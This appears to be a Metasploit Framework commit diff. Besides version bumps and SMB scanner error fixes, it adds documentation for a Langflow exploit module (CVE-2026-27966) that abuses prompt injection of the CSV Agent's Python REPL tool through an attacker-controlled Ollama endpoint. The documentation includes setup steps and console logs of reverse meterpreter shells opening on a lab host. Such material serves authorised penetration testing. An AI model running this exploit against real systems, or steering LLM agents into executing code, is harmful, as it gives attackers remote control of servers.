CERTCC
diff --git a/‎Gemfile.lock‎
Lines changed: 1 addition & 1 deletion b/‎Gemfile.lock‎
Lines changed: 1 addition & 1 deletion
diff --git a/‎LICENSE_GEMS‎
Lines changed: 1 addition & 1 deletion b/‎LICENSE_GEMS‎
Lines changed: 1 addition & 1 deletion
diff --git a/‎data/exploits/CVE-2026-27966/cve_2026_27966.json‎
Lines changed: 1285 additions & 0 deletions b/‎data/exploits/CVE-2026-27966/cve_2026_27966.json‎
Lines changed: 1285 additions & 0 deletions
diff --git a/‎db/modules_metadata_base.json‎
Lines changed: 67 additions & 7 deletions b/‎db/modules_metadata_base.json‎
Lines changed: 67 additions & 7 deletions
diff --git a/‎documentation/modules/exploit/multi/http/langflow_rce_cve_2026_27966.md‎
Lines changed: 186 additions & 0 deletions b/‎documentation/modules/exploit/multi/http/langflow_rce_cve_2026_27966.md‎
Lines changed: 186 additions & 0 deletions
diff --git a/‎lib/metasploit/framework/version.rb‎
Lines changed: 1 addition & 1 deletion b/‎lib/metasploit/framework/version.rb‎
Lines changed: 1 addition & 1 deletion
diff --git a/‎lib/msf/core/exploit/remote/ms_samr.rb‎
Lines changed: 1 addition & 1 deletion b/‎lib/msf/core/exploit/remote/ms_samr.rb‎
Lines changed: 1 addition & 1 deletion
diff --git a/‎modules/auxiliary/scanner/smb/psexec_loggedin_users.rb‎
Lines changed: 1 addition & 0 deletions b/‎modules/auxiliary/scanner/smb/psexec_loggedin_users.rb‎
Lines changed: 1 addition & 0 deletions
diff --git a/‎modules/auxiliary/scanner/smb/smb_enumshares.rb‎
Lines changed: 3 additions & 1 deletion b/‎modules/auxiliary/scanner/smb/smb_enumshares.rb‎
Lines changed: 3 additions & 1 deletion
diff --git a/‎modules/auxiliary/scanner/smb/smb_enumusers.rb‎
Lines changed: 10 additions & 3 deletions b/‎modules/auxiliary/scanner/smb/smb_enumusers.rb‎
Lines changed: 10 additions & 3 deletions
@@ -1,7 +1,7 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (6.4.129)
+    metasploit-framework (6.4.130)
       aarch64
       abbrev
       actionpack (~> 7.2.0)
 
@@ -97,7 +97,7 @@ memory_profiler, 1.1.0, MIT
 metasm, 1.0.5, LGPL-2.1
 metasploit-concern, 5.0.5, "New BSD"
 metasploit-credential, 6.0.21, "New BSD"
-metasploit-framework, 6.4.129, "New BSD"
+metasploit-framework, 6.4.130, "New BSD"
 metasploit-model, 5.0.4, "New BSD"
 metasploit-payloads, 2.0.245, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 6.0.15, "New BSD"
 
@@ -56861,7 +56861,7 @@
       "microsoft-ds"
     ],
     "targets": null,
-    "mod_time": "2025-06-20 13:20:44 +0000",
+    "mod_time": "2026-04-22 05:16:08 +0000",
     "path": "/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb",
     "is_install_path": true,
     "ref_name": "scanner/smb/psexec_loggedin_users",
@@ -56947,7 +56947,7 @@
       "microsoft-ds"
     ],
     "targets": null,
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2026-04-22 06:32:00 +0000",
     "path": "/modules/auxiliary/scanner/smb/smb_enumshares.rb",
     "is_install_path": true,
     "ref_name": "scanner/smb/smb_enumshares",
@@ -56997,7 +56997,7 @@
       "microsoft-ds"
     ],
     "targets": null,
-    "mod_time": "2026-02-06 11:25:47 +0000",
+    "mod_time": "2026-04-21 10:53:10 +0000",
     "path": "/modules/auxiliary/scanner/smb/smb_enumusers.rb",
     "is_install_path": true,
     "ref_name": "scanner/smb/smb_enumusers",
@@ -57086,7 +57086,7 @@
       "microsoft-ds"
     ],
     "targets": null,
-    "mod_time": "2026-02-06 11:25:47 +0000",
+    "mod_time": "2026-04-22 06:32:00 +0000",
     "path": "/modules/auxiliary/scanner/smb/smb_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/smb/smb_login",
@@ -57122,7 +57122,7 @@
       "microsoft-ds"
     ],
     "targets": null,
-    "mod_time": "2025-06-23 09:30:35 +0000",
+    "mod_time": "2026-04-22 05:23:34 +0000",
     "path": "/modules/auxiliary/scanner/smb/smb_lookupsid.rb",
     "is_install_path": true,
     "ref_name": "scanner/smb/smb_lookupsid",
@@ -57239,7 +57239,7 @@
       "microsoft-ds"
     ],
     "targets": null,
-    "mod_time": "2026-04-22 11:52:36 +0000",
+    "mod_time": "2026-04-22 06:12:33 +0000",
     "path": "/modules/auxiliary/scanner/smb/smb_uninit_cred.rb",
     "is_install_path": true,
     "ref_name": "scanner/smb/smb_uninit_cred",
@@ -57290,7 +57290,7 @@
       "microsoft-ds"
     ],
     "targets": null,
-    "mod_time": "2026-04-22 16:27:08 +0000",
+    "mod_time": "2026-04-21 11:20:54 +0000",
     "path": "/modules/auxiliary/scanner/smb/smb_version.rb",
     "is_install_path": true,
     "ref_name": "scanner/smb/smb_version",
@@ -112579,6 +112579,66 @@
     "session_types": false,
     "needs_cleanup": true
   },
+  "exploit_multi/http/langflow_rce_cve_2026_27966": {
+    "name": "Langflow RCE",
+    "fullname": "exploit/multi/http/langflow_rce_cve_2026_27966",
+    "aliases": [],
+    "rank": 600,
+    "disclosure_date": "2026-02-25",
+    "type": "exploit",
+    "author": [
+      "weblover12",
+      "Takahiro Yokoyama"
+    ],
+    "description": "The CSV Agent node in Langflow hardcodes allow_dangerous_code=True, which automatically exposes LangChain's Python REPL tool (python_repl_ast).\n          As a result, an attacker can execute arbitrary Python and OS commands on the server via prompt injection, leading to full Remote Code Execution (RCE).",
+    "references": [
+      "CVE-2026-27966",
+      "GHSA-3645-fxcv-hqr4"
+    ],
+    "platform": "Linux,Python,Unix",
+    "arch": "cmd, python",
+    "rport": 7860,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Linux Command",
+      "Python payload"
+    ],
+    "mod_time": "2026-04-18 12:56:53 +0000",
+    "path": "/modules/exploits/multi/http/langflow_rce_cve_2026_27966.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/langflow_rce_cve_2026_27966",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
   "exploit_multi/http/langflow_unauth_rce_cve_2025_3248": {
     "name": "Langflow AI RCE",
     "fullname": "exploit/multi/http/langflow_unauth_rce_cve_2025_3248",
 
@@ -0,0 +1,186 @@
+## Vulnerable Application
+
+The CSV Agent node in Langflow hardcodes allow_dangerous_code=True,
+which automatically exposes LangChain’s Python REPL tool (python_repl_ast).
+As a result, an attacker can execute arbitrary Python and OS commands on the server via prompt injection,
+leading to full Remote Code Execution (RCE).
+
+The vulnerability affects:
+
+    * Langflow < 1.8.0
+
+This module was successfully tested on:
+
+    * Langflow 1.7.3 installed with Docker
+
+
+### Installation
+1. `git clone https://github.com/langflow-ai/langflow.git`
+
+2. `git checkout 1.7.3`
+
+3. `cd langflow/docker_example`
+
+4. `Edit docker-compose.yml`
+```
+ services:
+   langflow:
+-    image: langflowai/langflow:latest # or another version tag on https://hub.docker.com/r/langflowai/langflow
+-    pull_policy: always               # set to 'always' when using 'latest' image
++    # image: langflowai/langflow:latest # or another version tag on https://hub.docker.com/r/langflowai/langflow
++    image: langflowai/langflow:1.7.3 # or another version tag on https://hub.docker.com/r/langflowai/langflow
++    # pull_policy: always               # set to 'always' when using 'latest' image
+     ports:
+       - "7860:7860"
+     depends_on:
+@@ -11,7 +12,7 @@ services:
+       # This variable defines where the logs, file storage, monitor data and secret keys are stored.
+       - LANGFLOW_CONFIG_DIR=/app/langflow
+     volumes:
+-      - langflow-data:/app/langflow
++      - langflow-data:/app
+ 
+   postgres:
+     image: postgres:16
+```
+
+5. `docker compose up`
+
+6. `On an attacker machine`
+```
+curl -fsSL https://ollama.com/install.sh | sh
+ollama run llama3.1
+```
+
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/multi/http/langflow_rce_cve_2026_27966`
+4. Do: `run lhost=<lhost> rhost=<rhost> ollamaapiuri=<ollamaapiuri> apikey=<apikey> model=<model>`
+5. You should get a meterpreter
+
+
+## Options
+
+### APIKEY (required)
+
+Langflow API key to interact with Langflow.
+
+### OLLAMAAPIURI (required)
+
+Endpoint of the OLLAMA API controlled by an attacker.
+
+### MODEL (required)
+
+Valid ollama model name.
+
+
+## Scenarios
+
+### cmd/linux/http/x64/meterpreter_reverse_tcp
+```
+msf > use exploit/multi/http/langflow_rce_cve_2026_27966
+[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
+msf exploit(multi/http/langflow_rce_cve_2026_27966) > options
+
+Module options (exploit/multi/http/langflow_rce_cve_2026_27966):
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   APIKEY                         yes       Langflow API key to interact with Langflow.
+   MODEL                          yes       Valid ollama model name.
+   OLLAMAAPIURI                   yes       Endpoint of the OLLAMA API controlled by an attacker.
+   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks5h, sapni, socks4, socks5, http
+   RHOSTS                         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT         7860             yes       The target port (TCP)
+   SSL           false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                          no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
+
+   Name            Current Setting  Required  Description
+   ----            ---------------  --------  -----------
+   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE    true             yes       Attempt to delete the binary after execution
+   FETCH_FILELESS  none             yes       Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8, tested shells are sh, bash, zsh) (Ac
+                                              cepted: none, python3.8+, shell-search, shell)
+   FETCH_SRVHOST                    no        Local IP to use for serving payload
+   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                    no        Local URI to use for serving payload
+   LHOST                            yes       The listen address (an interface may be specified)
+   LPORT           4444             yes       The listen port
+
+
+   When FETCH_COMMAND is one of CURL,GET,WGET:
+
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   FETCH_PIPE  false            yes       Host both the binary payload and the command so it can be piped directly to the shell.
+
+
+   When FETCH_FILELESS is none:
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_FILENAME      yVhDYYwMmZm      no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_WRITABLE_DIR  ./               yes       Remote writable dir to store payload; cannot contain spaces
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf exploit(multi/http/langflow_rce_cve_2026_27966) > run rhost=192.168.56.16 lhost=192.168.56.1 ollamaapiuri=http://192.168.56.1:11434 apikey=<apikey> model=llama3.1:latest payl
+oad=cmd/linux/http/x64/meterpreter_reverse_tcp target=Linux\ Command
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version 1.7.3 detected and API key is valid. Which is vulnerable.
+[*] Project: 367f399f-6f17-43a2-bea0-33183baae731
+[*] Flow: 42098574-2343-4b8a-97fe-0e2800270087
+[*] Job: 014b3154-e882-4649-9c16-5f25e4c358d9
+[*] Waiting...
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:59440) at 2026-04-18 12:31:49 +0900
+
+meterpreter > getuid
+Server username: user
+meterpreter > sysinfo
+Computer     : d513d5e46402
+OS           : Debian 13.3 (Linux 6.8.0-56-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
+
+### python/meterpreter/reverse_tcp
+```
+msf exploit(multi/http/langflow_rce_cve_2026_27966) > run rhost=192.168.56.16 lhost=192.168.56.1 ollamaapiuri=http://192.168.56.1:11434 apikey=<apikey> model=llama3.1:latest payload=python/meterpreter/reverse_tcp target=Python\ payload
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version 1.7.3 detected and API key is valid. Which is vulnerable.
+[*] Project: 146bfdff-95cc-4e43-b0f2-dbdaa6916401
+[*] Flow: 497484a7-6f39-4418-8113-aba0c2f57a3b
+[*] Job: 0e4282ad-bf9d-4079-891b-81a2ccb8dbe8
+[*] Waiting...
+[*] Sending stage (23404 bytes) to 192.168.56.16
+[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.16:47988) at 2026-04-18 12:48:07 +0900
+
+meterpreter > getuid
+Server username: user
+meterpreter > sysinfo
+Computer        : d513d5e46402
+OS              : Linux 6.8.0-56-generic #58-Ubuntu SMP PREEMPT_DYNAMIC Fri Feb 14 15:33:28 UTC 2025
+Architecture    : x64
+System Language : C
+Meterpreter     : python/linux
+meterpreter > 
+```
@@ -32,7 +32,7 @@ def self.get_hash
         end
       end
 
-      VERSION = "6.4.129"
+      VERSION = "6.4.130"
       MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
       PRERELEASE = 'dev'
       HASH = get_hash
 
@@ -60,7 +60,7 @@ def connect_samr(tree)
   rescue RubySMB::Dcerpc::Error::DcerpcError => e
     elog(e.message, error: e)
     raise MsSamrUnexpectedReplyError, e.message
-  rescue RubySMB::Error::RubySMBError
+  rescue RubySMB::Error::RubySMBError => e
     elog(e.message, error: e)
     raise MsSamrUnknownError, e.message
   end
 
@@ -80,6 +80,7 @@ def get_hku(ip, smbshare, cmd, text, bat)
       command = "#{cmd} /C echo reg.exe QUERY HKU ^> %SYSTEMDRIVE%#{text} > #{bat} & #{cmd} /C start cmd.exe /C #{bat}"
       out = psexec(command)
       output = get_output(ip, smbshare, text)
+      return nil unless output
       cleanout = Array.new
       output.each_line { |line| cleanout << line.chomp if line.include?("HKEY") && line.split("-").size == 8 && !line.split("-")[7].include?("_") }
       return cleanout
 
@@ -311,7 +311,9 @@ def run_host(ip)
           connect(versions: [1, 2, 3])
         end
         smb_login
-        break unless enum_shares(ip).empty?
+        shares = enum_shares(ip)
+        next if shares.nil? || shares.empty?
+        break
       rescue ::Interrupt
         raise $ERROR_INFO
       rescue Errno::ECONNRESET => e
 
@@ -108,7 +108,12 @@ def run_service(port, direct)
   def run_service_domain(tree, smb_domain: nil)
     @smb_domain = smb_domain
 
-    samr_con = connect_samr(tree)
+    begin
+      samr_con = connect_samr(tree)
+    rescue ::Exception => e
+      print_error("SAMR connection failed: #{e.class} #{e}")
+      return nil
+    end
 
     lockout_info = samr_con.samr.samr_query_information_domain(
       domain_handle: samr_con.domain_handle,
@@ -132,8 +137,10 @@ def run_service_domain(tree, smb_domain: nil)
       end
     end
   ensure
-    samr_con.samr.close_handle(samr_con.domain_handle) if samr_con.domain_handle
-    samr_con.samr.close_handle(samr_con.server_handle) if samr_con.server_handle
+    if samr_con
+      samr_con.samr.close_handle(samr_con.domain_handle) if samr_con.domain_handle
+      samr_con.samr.close_handle(samr_con.server_handle) if samr_con.server_handle
+    end
   end
 
   def report_username(domain, username)